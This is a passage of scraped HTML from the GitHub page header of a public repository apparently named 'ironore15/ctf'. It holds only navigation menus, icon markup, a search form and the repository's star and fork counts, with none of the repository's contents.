0-1.14-.243-1.847-.705-2.319-.477-.488-1.318-.862-2.824-1.025-1.487-.161-2.192.139-2.533.529-.268.308-.437.808-.438 1.578v.02c.002.299.023.598.063.894Z"></path></svg> <div> <div class="color-fg-default h4">Copilot</div> Write better code with AI </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-code-review color-fg-subtle mr-3"> <path d="M10.3 6.74a.75.75 0 0 1-.04 1.06l-2.908 2.7 2.908 2.7a.75.75 0 1 1-1.02 1.1l-3.5-3.25a.75.75 0 0 1 0-1.1l3.5-3.25a.75.75 0 0 1 1.06.04Zm3.44 1.06a.75.75 0 1 1 1.02-1.1l3.5 3.25a.75.75 0 0 1 0 1.1l-3.5 3.25a.75.75 0 1 1-1.02-1.1l2.908-2.7-2.908-2.7Z"></path><path d="M1.5 4.25c0-.966.784-1.75 1.75-1.75h17.5c.966 0 1.75.784 1.75 1.75v12.5a1.75 1.75 0 0 1-1.75 1.75h-9.69l-3.573 3.573A1.458 1.458 0 0 1 5 21.043V18.5H3.25a1.75 1.75 0 0 1-1.75-1.75ZM3.25 4a.25.25 0 0 0-.25.25v12.5c0 .138.112.25.25.25h2.5a.75.75 0 0 1 .75.75v3.19l3.72-3.72a.749.749 0 0 1 .53-.22h10a.25.25 0 0 0 .25-.25V4.25a.25.25 0 0 0-.25-.25Z"></path></svg> <div> <div class="color-fg-default h4">Code review</div> Manage code changes </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-issue-opened color-fg-subtle mr-3"> <path d="M12 1c6.075 0 11 4.925 11 11s-4.925 11-11 11S1 18.075 1 12 5.925 1 12 1ZM2.5 12a9.5 9.5 0 0 0 9.5 9.5 9.5 9.5 0 0 0 9.5-9.5A9.5 9.5 0 0 0 12 2.5 9.5 9.5 0 0 0 2.5 12Zm9.5 2a2 2 0 1 1-.001-3.999A2 2 0 0 1 12 14Z"></path></svg> <div> <div class="color-fg-default h4">Issues</div> Plan and track work </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-comment-discussion color-fg-subtle mr-3"> <path d="M1.75 1h12.5c.966 0 1.75.784 1.75 1.75v9.5A1.75 1.75 0 0 1 14.25 14H8.061l-2.574 2.573A1.458 1.458 0 0 1 3 15.543V14H1.75A1.75 1.75 0 0 1 0 12.25v-9.5C0 1.784.784 1 1.75 1ZM1.5 2.75v9.5c0 .138.112.25.25.25h2a.75.75 0 0 1 .75.75v2.19l2.72-2.72a.749.749 0 0 1 .53-.22h6.5a.25.25 0 0 0 .25-.25v-9.5a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25Z"></path><path d="M22.5 8.75a.25.25 0 0 0-.25-.25h-3.5a.75.75 0 0 1 0-1.5h3.5c.966 0 1.75.784 1.75 1.75v9.5A1.75 1.75 0 0 1 22.25 20H21v1.543a1.457 1.457 0 0 1-2.487 1.03L15.939 20H10.75A1.75 1.75 0 0 1 9 18.25v-1.465a.75.75 0 0 1 1.5 0v1.465c0 .138.112.25.25.25h5.5a.75.75 0 0 1 .53.22l2.72 2.72v-2.19a.75.75 0 0 1 .75-.75h2a.25.25 0 0 0 .25-.25v-9.5Z"></path></svg> <div> <div class="color-fg-default h4">Discussions</div> Collaborate outside of code </div>
Explore
All features
Documentation
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
GitHub Skills
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
Blog
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
</div>
<button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-3 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Solutions <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path></svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 py-2 py-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 px-lg-4"> For
Enterprise
Teams
Startups
Education
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
By Solution
CI/CD & Automation
DevOps
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
DevSecOps
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
Case Studies
Customer Stories
Resources
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
</div>
<button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-3 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Open Source <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path></svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 py-2 py-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 px-lg-4">
<div> <div class="color-fg-default h4">GitHub Sponsors</div> Fund open source developers </div>
<div> <div class="color-fg-default h4">The ReadME Project</div> GitHub community articles </div>
Repositories
Topics
Trending
Collections
</div>
Pricing
</nav>
<div class="d-lg-flex flex-items-center px-3 px-lg-0 mb-3 mb-lg-0 text-center text-lg-left"> <div class="d-lg-flex min-width-0 mb-2 mb-lg-0">
<div class="header-search flex-auto position-relative js-site-search flex-self-stretch flex-md-self-auto mb-3 mb-md-0 mr-0 mr-md-3 scoped-search site-scoped-search js-jump-to"> <div class="position-relative"> </option></form><form class="js-site-search-form" role="search" aria-label="Site" data-scope-type="Repository" data-scope-id="239170367" data-scoped-search-url="/ironore15/ctf/search" data-owner-scoped-search-url="/users/ironore15/search" data-unscoped-search-url="/search" data-turbo="false" action="/ironore15/ctf/search" accept-charset="UTF-8" method="get"> <label class="form-control header-search-wrapper input-sm p-0 js-chromeless-input-container header-search-wrapper-jump-to position-relative d-flex flex-justify-between flex-items-center"> <input type="text" class="form-control js-site-search-focus header-search-input jump-to-field js-jump-to-field js-site-search-field is-clearable" data-hotkey=s,/ name="q" placeholder="Search" data-unscoped-placeholder="Search GitHub" data-scoped-placeholder="Search" autocapitalize="off" role="combobox" aria-haspopup="listbox" aria-expanded="false" aria-autocomplete="list" aria-controls="jump-to-results" aria-label="Search" data-jump-to-suggestions-path="/_graphql/GetSuggestedNavigationDestinations" spellcheck="false" autocomplete="off" > <input type="hidden" data-csrf="true" class="js-data-jump-to-suggestions-path-csrf" value="i7KMsT4EV/4gYuetAb77hvivNWrkyUQSd6DSGzptwGTin+iNdbBFOenVBEY/TjlJ85atGWZGOji30VXBcGwKfQ==" /> <input type="hidden" class="js-site-search-type-field" name="type" > <svg xmlns="http://www.w3.org/2000/svg" width="22" height="20" aria-hidden="true" class="mr-1 header-search-key-slash"><path fill="none" stroke="#979A9C" opacity=".4" d="M3.5.5h12c1.7 0 3 1.3 3 3v13c0 1.7-1.3 3-3 3h-12c-1.7 0-3-1.3-3-3v-13c0-1.7 1.3-3 3-3z"></path><path fill="#979A9C" d="M11.8 6L8 15.1h-.9L10.8 6h1z"></path></svg>
<div class="Box position-absolute overflow-hidden d-none jump-to-suggestions js-jump-to-suggestions-container">
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
<span>No suggested jump to results</span>
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this user </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
</div> </label></form> </div></div>
</div>
<div class="position-relative mr-lg-3 d-lg-inline-block"> Sign in </div>
Sign up </div> </div> </div> </div></header>
</div>
<div id="start-of-content" class="show-on-focus"></div>
<div id="js-flash-container" data-turbo-replace>
<template class="js-flash-template"> <div class="flash flash-full {{ className }}"> <div class="px-2" > <button autofocus class="flash-close js-flash-close" type="button" aria-label="Dismiss this message"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg> </button> <div aria-atomic="true" role="alert" class="js-flash-alert"> <div>{{ message }}</div>
</div> </div></div> </template></div>
<include-fragment class="js-notification-shelf-include-fragment" data-base-src="https://github.com/notifications/beta/shelf"></include-fragment>
<div class="application-main " data-commit-hovercards-enabled data-discussion-hovercards-enabled data-issue-and-pr-hovercards-enabled > <div itemscope itemtype="http://schema.org/SoftwareSourceCode" class=""> <main id="js-repo-pjax-container" >
<div id="repository-container-header" class="pt-3 hide-full-screen" style="background-color: var(--color-page-header-bg);" data-turbo-replace>
<div class="d-flex flex-wrap flex-justify-end mb-3 px-3 px-md-4 px-lg-5" style="gap: 1rem;">
<div class="flex-auto min-width-0 width-fit mr-3"> <div class=" d-flex flex-wrap flex-items-center wb-break-word f3 text-normal"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo color-fg-muted mr-2"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <span> ironore15 </span> <span>/</span> ctf
<span></span><span>Public</span> </div>
</div>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-bell mr-2"> <path d="M8 16a2 2 0 0 0 1.985-1.75c.017-.137-.097-.25-.235-.25h-3.5c-.138 0-.252.113-.235.25A2 2 0 0 0 8 16ZM3 5a5 5 0 0 1 10 0v2.947c0 .05.015.098.042.139l1.703 2.555A1.519 1.519 0 0 1 13.482 13H2.518a1.516 1.516 0 0 1-1.263-2.36l1.703-2.554A.255.255 0 0 0 3 7.947Zm5-3.5A3.5 3.5 0 0 0 4.5 5v2.947c0 .346-.102.683-.294.97l-1.703 2.556a.017.017 0 0 0-.003.01l.001.006c0 .002.002.004.004.006l.006.004.007.001h10.964l.007-.001.006-.004.004-.006.001-.007a.017.017 0 0 0-.003-.01l-1.703-2.554a1.745 1.745 0 0 1-.294-.97V5A3.5 3.5 0 0 0 8 1.5Z"></path></svg>Notifications
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo-forked mr-2"> <path d="M5 5.372v.878c0 .414.336.75.75.75h4.5a.75.75 0 0 0 .75-.75v-.878a2.25 2.25 0 1 1 1.5 0v.878a2.25 2.25 0 0 1-2.25 2.25h-1.5v2.128a2.251 2.251 0 1 1-1.5 0V8.5h-1.5A2.25 2.25 0 0 1 3.5 6.25v-.878a2.25 2.25 0 1 1 1.5 0ZM5 3.25a.75.75 0 1 0-1.5 0 .75.75 0 0 0 1.5 0Zm6.75.75a.75.75 0 1 0 0-1.5.75.75 0 0 0 0 1.5Zm-3 8.75a.75.75 0 1 0-1.5 0 .75.75 0 0 0 1.5 0Z"></path></svg>Fork <span>0</span>
<div data-view-component="true" class="BtnGroup d-flex"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-star v-align-text-bottom d-inline-block mr-2"> <path d="M8 .25a.75.75 0 0 1 .673.418l1.882 3.815 4.21.612a.75.75 0 0 1 .416 1.279l-3.046 2.97.719 4.192a.751.751 0 0 1-1.088.791L8 12.347l-3.766 1.98a.75.75 0 0 1-1.088-.79l.72-4.194L.818 6.374a.75.75 0 0 1 .416-1.28l4.21-.611L7.327.668A.75.75 0 0 1 8 .25Zm0 2.445L6.615 5.5a.75.75 0 0 1-.564.41l-3.097.45 2.24 2.184a.75.75 0 0 1 .216.664l-.528 3.084 2.769-1.456a.75.75 0 0 1 .698 0l2.77 1.456-.53-3.084a.75.75 0 0 1 .216-.664l2.24-2.183-3.096-.45a.75.75 0 0 1-.564-.41L8 2.694Z"></path></svg><span> Star</span> <span>14</span> <button disabled="disabled" aria-label="You must be signed in to add this repository to a list" type="button" data-view-component="true" class="btn-sm btn BtnGroup-item px-2"> 